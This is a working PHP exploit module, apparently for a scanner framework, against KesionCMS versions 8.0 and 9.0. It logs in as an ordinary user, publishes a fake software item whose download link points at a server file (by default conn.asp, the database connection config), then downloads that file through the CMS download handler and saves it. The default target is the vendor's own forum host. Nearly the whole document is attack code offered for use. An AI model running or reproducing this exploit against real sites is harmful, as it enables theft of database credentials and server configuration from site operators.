科讯任意文件下载 exploit for wve

<?php

class kesion8x_9x{

public function info(){ //定义info 方法返回数组信息

$info=array(

        'info'=>array(  //info 数组定义模块相关信息
                 'author'=>'鬼哥',  //作者信息
                 'title'=>'kesionCMS >=8.0 9.0 任意下载漏洞', //模块名称
                 'info'=>'https://forum.90sec.org/thread-3874-1-1.html'  //模块简介
                 ),
        'option'=>array(  //模块参数信息设置
             
                 'host'=>'bbs.kesion.com', //host初始化值127.0.0.1
                 'path'=>'/',
                 'port'=>'80',
                 'xiafile'=>'conn.asp',
                 'user'=>'tttttt',
                 'pass'=>'tttttt',
                 'classid'=>'自动获取'
                 )

                 );

return $info; 
}

public function tjwj($classids,$coo)
{
    $data=HTTP::GET(G('host'),G('path').'user/User_MySoftWare.asp?action=AddSave&channelid=3&ClassID='.$classids.'&Title=aaniu&DownUrls=/'.G('xiafile'),$coo,'');

    if(strpos($data,'Action=Add&ClassID=')!== false)
    {
        $this->tjwj2($coo);
    }
    elseif(strpos($data,'系统设定不能在此栏目发表')!== false)
    {
        msg('classid='.$classids.' 错误,请手动到/plus/rss.asp获取',1);
    }
    else
    {
        msg('soft publish fail',1);
    }
}

public function tjwj2($coo)
{
    $data=HTTP::GET(G('host'),G('path').'user/User_ItemInfo.asp?ChannelID=3',$coo,'');

    if(strpos($data,'value=')!== false)
    {
        preg_match('/value=\"(.+?)\"/', $data, $arr);
        $this->tjwj3($arr[1]);
    }
    else
    {
        msg('Get Download address error',1);
    }
}

public function tjwj3($id)
{
    $data=HTTP::GET(G('host'),G('path').'item/downLoad.asp?m=3&downid=1&id='.$id,'','http://'.G('host').G('path'));


        $james=fopen(G('xiafile'),"w");
        fwrite($james,$data);
        fclose($james);

        msg(G('xiafile') . ': successfully downloaded',1);
$htmlfile=G('xiafile');
if(file_exists($htmlfile)){
system("start ".$htmlfile);
}


}

public function tjwj4($classids)
{
    $data=HTTP::GET(G('host'),G('path').'user/CheckUserLogin.asp?Username='.G('user').'&Password='.G('pass'),'','');

    if(strpos($data,'RndPassword=')!== false)
    {
        preg_match('/Set-Cookie: (.*)/', $data, $arr);

        $str=$arr[1];
        $order   = array("\r\n", "\n", "\r");  
        $replace = '';
        $str=str_replace($order, $replace, $str);

        $this->tjwj($classids,$str);
    }
    else
    {
        msg('user '.G('user').' login fail',1);
    }
}

public function run(){ //模块运行函数 msg("HOST => ".G('host'),1); // 

if(G('classid')=='自动获取')
{

$data=HTTP::GET(G('host'),G('path').'plus/rss.asp','','');

if(strpos($data,'?classid=')!== false)
{
preg_match('/classid=(.+?)&/', $data, $arr);

//$result=explode("=",$arr[1]);
$this->tjwj4($arr[1]);
}
else
{
msg('Get classid fail',1);
}

}
else
{
$this->tjwj4(G('classid'));
}

}



}

?>
文章目录
